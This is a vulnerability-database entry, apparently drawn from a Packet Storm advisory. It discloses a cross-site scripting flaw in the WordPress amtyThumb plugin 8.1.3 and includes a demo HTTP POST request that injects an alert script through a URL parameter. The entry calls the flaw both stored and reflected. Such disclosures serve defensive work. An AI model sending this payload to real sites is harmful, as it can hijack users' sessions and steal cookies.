ID

VAR-E-201711-0293


TITLE

WordPress amtyThumb 8.1.3 Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 145044

DESCRIPTION

WordPress amtyThumb plugin version 8.1.3 suffers from a cross site scripting vulnerability.

Trust: 0.5

sources: PACKETSTORM: 145044

AFFECTED PRODUCTS

vendor:wordpressmodel:amtythumbscope:eqversion:8.1.3

Trust: 0.5

sources: PACKETSTORM: 145044

EXPLOIT

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable amtyThumb posts Plugin 8.1.3

amtyThumb posts Plugin is prone to a stored cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:

Demo Request POST:

POST
/wordpress/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?"><script>alert("XSS")</script>=1
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

amty_hidden=1

Trust: 0.5

sources: PACKETSTORM: 145044

EXPLOIT HASH

LOCAL

SOURCE

md5: 749cafe35287a46fc9858168d75df892
sha-1: 4367fab546aec6440ea3060b05d46961a8c200f6
sha-256: f4adb254fab1f835411c2f1924dd745e3c97fd0cb6e3c173269ff7e384e42302
md5: 749cafe35287a46fc9858168d75df892

Trust: 0.5

sources: PACKETSTORM: 145044

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 145044

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 145044

TAGS

tag:exploit

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 145044

CREDITS

Ricardo Sanchez

Trust: 0.5

sources: PACKETSTORM: 145044

EXTERNAL IDS

db:PACKETSTORMid:145044

Trust: 0.5

sources: PACKETSTORM: 145044

SOURCES

db:PACKETSTORMid:145044

LAST UPDATE DATE

2022-07-27T09:49:19.762000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:145044date:2017-11-18T22:22:22